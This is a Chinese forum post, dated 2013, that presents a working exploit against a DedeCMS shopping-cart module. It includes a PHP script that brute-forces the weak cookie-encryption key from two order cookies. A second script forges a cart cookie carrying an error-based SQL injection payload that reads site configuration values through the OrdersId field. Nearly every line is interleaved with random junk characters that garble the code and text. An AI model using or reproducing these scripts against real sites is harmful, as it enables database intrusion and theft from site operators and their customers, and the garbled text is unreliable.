www.xxx.com/plus/search.php?keyword=
2 f; D; r+ ~0 x在 include/shopcar.class.php中8 {' l) G- @& K1 X1 Q/ L
先看一下这个shopcar类是如何生成cookie的+ r+ \* K4 M1 G& ~4 D
239 function saveCookie($key,$value); X3 P6 N, X, g4 D$ D7 C& K' Y' C: g
240 {
8 R' L# d3 Y* I. ^241 if(is_array($value))
* }4 e. X. E, C1 U2 ]: b3 A242 {7 h( `/ s/ c2 l8 V9 i a( g. q
243 $value = $this->enCrypt($this->enCode($value));4 ] x; O8 _- h) g8 A9 G& E
244 }7 Z5 Z: l1 W4 \+ p/ `7 U; @
245 else
6 W7 D; n8 m7 f# i1 \1 Z2 y246 { e% V% W. p1 V" W. @& C
247 $value = $this->enCrypt($value);
a8 k& E0 M+ j; ?- T; R7 l248 }7 k/ b- S' ^0 l, y0 U6 }
249 setcookie($key,$value,time()+36000,’/');
Q9 V+ G' l- K- C4 Y250 }3 R8 V9 j/ ~; m8 o$ z. j
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
7 M2 B4 k- M+ ~2 M8 u186 function enCrypt($txt)
- | v, g2 v3 ^$ d# E& Y+ V& A187 {
3 t0 p5 B1 Z4 \+ Q; y: ]188 srand((double)microtime() * 1000000);* z# p K" h5 G3 |" y& N! c3 P4 K
189 $encrypt_key = md5(rand(0, 32000));: B- o1 U. ^6 ^6 b
190 $ctr = 0;, e5 m9 c7 K& T+ R
191 $tmp = ”;
# e8 }- m- P) w7 A# [1 L& Q( s* Q192 for($i = 0; $i < strlen($txt); $i++)$ f0 w0 o" R' c5 h- f3 X- M( q; Q9 R
193 {
7 u F9 I. Z# P9 r6 e194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;6 d5 ~4 R6 B( y$ [* G7 L. l7 b; r) F0 P
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
+ h: j' Q# A1 {, ^3 o196 }+ e& j3 v/ I! `* n- i
197 return base64_encode($this->setKey($tmp));/ M9 n! _, Q3 Y. u- j1 C! ^
198 }5 f; C& a1 T+ P
213 function setKey($txt)# h4 a* @( Z: r2 ~
214 {
8 o; ~0 F$ v( ~215 global $cfg_cookie_encode;( i! I$ o5 @! o* W
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
1 b6 ?$ w e- e217 $ctr = 0;' ]& a3 P/ T( t: x1 J" g1 P
218 $tmp = ”;
& n' E' v$ C1 y3 ~, R1 c, E0 q; |! w i219 for($i = 0; $i < strlen($txt); $i++). E" M5 {+ S+ u7 y) L
220 {
- p6 m# X3 e9 A8 t! O221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ j n4 u! `6 g7 L+ P1 J222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];0 T2 r6 Y1 g8 {7 I) M" C
223 }& [! ]& U3 S ]! V2 h5 J O
224 return $tmp;6 j. x' O. @0 _
225 }5 o. O! C+ p$ L0 H% S, e
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
N. D/ m$ p/ n- i, n4 K% U" d然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。5 l9 s. R$ U3 M* M
具体代码如下:
# G: e/ L* N" U<?php
6 u$ N/ L4 Z2 c$ {! f$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
8 t1 J: j; O" Q" H! m$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here2 E! J: }$ q/ _6 ^4 r- [
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
" V, X) \* h2 p Mfunction reStrCode($code,$string)" J- ?) a! N. O: _* k
{& [" r6 @2 ]$ C5 ~" P
$code = base64_decode($code);/ y* {% ^1 n2 j" M
$key = “”;
8 E3 B3 K0 T' V' hfor($i=0 ; $i<32 ; $i++)9 D7 i+ R# }6 o6 B+ h
{% V" K+ u. h% I* G) B/ \+ G# P
$key .= $string[$i] ^ $code[$i];! [7 R% P8 `: g# r. f+ h
}
" I9 q5 G9 l6 r8 S/ u4 |return $key;
. }: x9 J7 Z: B; D0 K7 O}% r+ \$ W, E$ _+ {
function getKeys($cookie,$plantxt)
- o. W- T6 f$ J* R{: T+ w$ I8 i' y' P$ [" K, p
$tmp = $cookie;
c, ^, n3 R- l5 L8 l: Q7 j$results = array();; [: i7 I8 J/ T6 F; \
for($j=0 ; $j < 32000; $j++)' R! f# l" l1 l4 [' \
{& Z: N! m' ^( O2 r4 ~$ Z- x; _
: U; u6 z( k/ a! l" }1 ~" k$txt = $plantxt;
& V5 f8 f Y$ T$ `/ R/ r$ctr = 0;
# Z/ P7 b l. _( n% K6 D$tmp = ”;
" t% U. K1 _" o2 Q, I8 N7 X) ?$encrypt_key = md5($j);
7 ^8 Q/ U% B3 f t6 @for($i =0; $i < strlen($txt); $i ++)' h$ X# R9 I- D4 c
{
9 ]6 z6 b5 r" d L# w, v$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ f$ k: N' s1 Z) |" A/ m2 W) B
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);1 S- v9 U# c7 y4 i- {
}2 B/ I" {6 Y* ^; w' P6 K" w M
$string = $tmp;
: l6 A8 C0 y7 T2 ^: R$code = $cookie;
3 ?8 n) Z4 d+ B+ m% V; c$result = reStrCode($code,$string);
" c, v. B6 x! dif(eregi(‘^[a-z0-9]+$’,$result))
1 ?+ v2 L2 O2 G$ E# N; {{( K0 r. Q8 S7 t* S& Y7 @+ I
echo $result.”\n”;$ S D6 ^, l+ j' n! f* J# z* p
$results[] = $result;
* V8 g1 b4 z2 e- h- {; D R}
' r- P* ^' \0 x6 W( ~4 T}2 L- {' @% K) Z: K' c @5 ~
return $results;" |- [5 Y7 ^" f" `) d$ a& T8 [
}% |. z4 m2 L! ?2 A3 Q9 j3 P; Q
$results1 = getKeys($cookie1,$plantxt);/ ^) o( |! [3 W& p7 k8 x) ]# q7 N
$results2 = getKeys($cookie2,$plantxt);
5 O: c2 v* r# C, @/ ]4 L0 U2 Lprint “\n——————–real key————————–\n”;
/ I" y d! H% H1 Xforeach($results1 as $test1)6 k+ O$ }9 [' O3 V; r$ D
{: q+ \3 u8 s4 B6 N
foreach($results2 as $test2)
4 [* f/ C, J& ?; O- O4 d ^& p7 U4 u{$ H# y% ]0 I# p4 r* {
if($test1 == $test2)# ]( H% x: b+ @' v
{! a) ~$ M; H6 S3 Z9 J& k, j( E
echo $test1.”\n”;
" Z1 M! [+ U. A; d4 t* a8 }8 a}2 q, y+ V& H" \) I
}
9 P4 T+ {9 Y" s}& `3 v6 {- z `( \. R e; d
?>
- N& h/ [/ @- u+ `- fcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,; Y) J D( Y3 p0 V, F5 D
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1# L C! B% |/ S2 N* Q& r4 H
然后推算出md5(strtolower($cfg_cookie_encode))
3 F/ V: v Q8 i! n4 b得到这个key之后,我们就可以构造任意购物车的cookie
6 h/ W5 [/ `1 k p, i2 e r+ @接着看
/ W5 M7 K# |- ~ u20 class MemberShops
! E; l2 t* c( y( h. ?1 M% w& A21 {
! ^( q+ e! M2 l: K6 O. z+ E7 P$ G1 i, F22 var $OrdersId;/ q& A" k$ u" z$ I$ m5 e
23 var $productsId;( m5 B }$ E5 g& k1 v- F
243 v0 i/ g- {: k9 W' X j
25 function __construct()- Z% k4 a8 U+ \
26 {
4 x+ f! @$ n$ I27 $this->OrdersId = $this->getCookie(“OrdersId”);
3 D* K7 ]' V% f, m6 K& n28 if(empty($this->OrdersId))- t# ]5 S% f& G& o, b w
29 {
# C) r9 k4 G9 S4 R: |30 $this->OrdersId = $this->MakeOrders();
- ?- V/ X5 s6 ?1 W/ ^31 }
& j5 T# V. Q0 U c0 e32 } q6 V \" A: Q
发现OrderId是从cookie里面获取的
' g o4 u6 U$ d. A& u6 m然后
0 q8 x& Z" [+ M, l+ _1 J* I+ C4 t; s/plus/carbuyaction.php中的
! y& A$ g& J. F7 J29 $cart = new MemberShops();% r3 R' F2 N" f* }8 a9 @- ~) v8 X
39 $OrdersId = $cart->OrdersId; //本次记录的订单号- u% A1 ] q) c: R* @9 g
……
9 I+ E' M8 B5 k/ E6 p173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
5 t8 s& b3 L% @/ o/ O1 ^; r; a接着我们就可以注入了: J; _/ v' _) O: e$ H- Y+ D: e6 z
通过利用下面代码生成cookie:- ?/ t$ @+ J) W) r
<?php, n! J4 j. c. I% _/ Q
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;7 B& _6 z+ K5 m" @6 z/ G2 v
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
# S3 j' x0 k' z; r9 `8 q, cfunction setKey($txt)/ w" j6 a! S6 A! A, q
{ h4 X! G7 I ^+ I* i
global $encrypt_key;) b# N3 x- X9 P4 C, o. m! h7 `
$ctr = 0;
4 T6 f5 n" N2 o$tmp = ”;
$ J3 `( D# _2 @/ Y. y/ Efor($i = 0; $i < strlen($txt); $i++)
0 S0 D# y, D4 S( Q{( Y0 t( j5 Z0 V4 i" B/ y- F
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, e# H Z% a a- I$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];; ^# x' a1 M/ w/ T- a- L
}
9 R( S V/ u* treturn $tmp;9 g3 c; G: K: X: m/ e
}& I) g. g! r. T# q+ `: @
function enCrypt($txt)& R1 C$ G+ I. u/ k* q, ^) \
{
5 E/ b/ A' s1 n& O8 Xsrand((double)microtime() * 1000000);
. M1 k! o0 N$ E5 N$encrypt_key = md5(rand(0, 32000));( Z' H1 D2 D+ F
$ctr = 0;( n) W* U7 R8 J& _* y; {
$tmp = ”;
% _3 |/ g2 L0 y) \! p# lfor($i = 0; $i < strlen($txt); $i++)
" L) o# J6 O& j v4 X" N7 ~{
' M I- U3 s3 N- @2 ?: g: y$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ o1 H1 y+ ]# ]# Z" d
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* `! b7 Q/ v6 {9 ^; U}$ J+ \; H# I0 c! H
return base64_encode(setKey($tmp));* U; z" _9 Q ^( a
}4 p; H* G4 D6 c4 N. }. C% R
for($dest =0;$dest = enCrypt($txt);)
8 e# _2 m3 G, N. k9 ?{" j* v/ M1 Z& ?: e9 E
if(!strpos($dest,’+'))
6 D9 g% O9 C1 a# ]9 ^{
4 Z; P7 D6 U8 A- [break;
- n& l& x3 v O k" Y}" r& E! E' N* t" O0 ]: ?* Y
}, i/ E' E m) y+ j+ P1 }
echo $dest.”\n”;
5 p6 e. [, f7 O) n9 x, I?>
9 a: |) M2 P! v* ^' U
9 s4 A4 y7 r( e3 K6 B |
发表于 2013-2-13 23:58:29
收藏
支持
反对